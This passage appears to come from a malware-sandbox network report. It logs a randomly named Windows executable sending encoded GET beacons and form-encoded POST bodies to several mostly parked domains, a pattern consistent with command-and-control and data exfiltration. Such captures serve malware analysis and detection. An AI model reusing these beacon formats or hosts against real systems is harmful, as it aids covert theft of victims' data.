                                                                                                                                Nov 18, 2024 16:28:41.566323042 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.578819990 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.583885908 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.584134102 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.594012022 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:42.599014044 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:42.599067926 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:43.220412016 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:43.220499039 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:44.106977940 CET5003580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:44.112289906 CET80500353.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.126246929 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.131340981 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.131437063 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.141664982 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.146562099 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.781634092 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.782121897 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:45.785368919 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.785368919 CET5003680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:45.790302992 CET80500363.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.009233952 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.014213085 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.016797066 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.023539066 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.028976917 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.658025980 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.658845901 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:02.660752058 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.669452906 CET5003780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:29:02.675072908 CET80500373.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:08.219144106 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.224206924 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:08.224683046 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.234448910 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:08.239811897 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.044819117 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.091023922 CET5003880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:29:09.153392076 CET8050038217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:29:09.153448105 CET5003880192.168.2.6217.70.184.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49829 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:25:29.400605917 CET | 397 | OUT | GET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:25:30.979819059 CET | 416 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 18 Nov 2024 15:25:30 GMT
Content-Type: text/html
Content-Length: 276
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49908 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:25:46.126424074 CET | 640 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ
Nov 18, 2024 16:25:46.930119991 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:25:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49923 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:25:48.672698975 CET | 664 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDKBlYJ9CKL3OXfb6ciPZPxqxRGlq2hPgHorQK3P+JiDSg==
Nov 18, 2024 16:25:49.506694078 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:25:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49938 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:25:51.218940020 CET | 1677 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD= [TRUNCATED]
Nov 18, 2024 16:25:52.011579037 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:25:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49952 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:25:53.947909117 CET | 389 | OUT | GET /gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.4nk.education
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:25:54.789060116 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 15:25:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self'; script-src 'nonce-4999172512364af7b0aa14c9f9783b3b';
Vary: Accept-Language
                                                                                                                                Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-4999172512364af7b0aa14c9f9783b3b';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
Nov 18, 2024 16:25:54.789132118 CET | 1236 | IN | Data Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
Nov 18, 2024 16:25:54.789165020 CET | 161 | IN | Data Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>
Nov 18, 2024 16:25:54.789195061 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49986 | 199.59.243.227 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:00.157017946 CET | 664 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 78 6b 7a 4c 43 67 70 47 32 78 4a 77 43 79 73 78 69 64 4f 44 37 71 76 67 43 30 63 34 56 6d 31 43 6e 45 42 58 49 48 56 51 48 2b 71
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CxkzLCgpG2xJwCysxidOD7qvgC0c4Vm1CnEBXIHVQH+q
Nov 18, 2024 16:26:00.735748053 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:00 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: 064062cb-28b2-458a-bbd8-7e2e3ff1c9df
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=064062cb-28b2-458a-bbd8-7e2e3ff1c9df; expires=Mon, 18 Nov 2024 15:41:00 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 18, 2024 16:26:00.735800982 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDY0MDYyY2ItMjhiMi00NThhLWJiZDgtN2UyZTNmZjFjOWRmIiwicGFnZV90aW1lIjoxNzMxOTQzNT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49989 | 199.59.243.227 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:02.709602118 CET | 688 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4b 74 67 41 73 75 34 31 6d 66 41 6e 38 42 46 66 4c 79 66 7a 62 4a 4e 7a 47 30 59 42 4d 71 45 56 37 51 6a 32 4f 53 62 35 4c 43 6f 77 3d 3d
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrKtgAsu41mfAn8BFfLyfzbJNzG0YBMqEV7Qj2OSb5LCow==
Nov 18, 2024 16:26:03.375417948 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:02 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: 7101e31f-801f-440f-a114-dde4c9b88e01
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=7101e31f-801f-440f-a114-dde4c9b88e01; expires=Mon, 18 Nov 2024 15:41:03 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 18, 2024 16:26:03.375438929 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzEwMWUzMWYtODAxZi00NDBmLWExMTQtZGRlNGM5Yjg4ZTAxIiwicGFnZV90aW1lIjoxNzMxOTQzNT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49990 | 199.59.243.227 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:05.250812054 CET | 1701 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
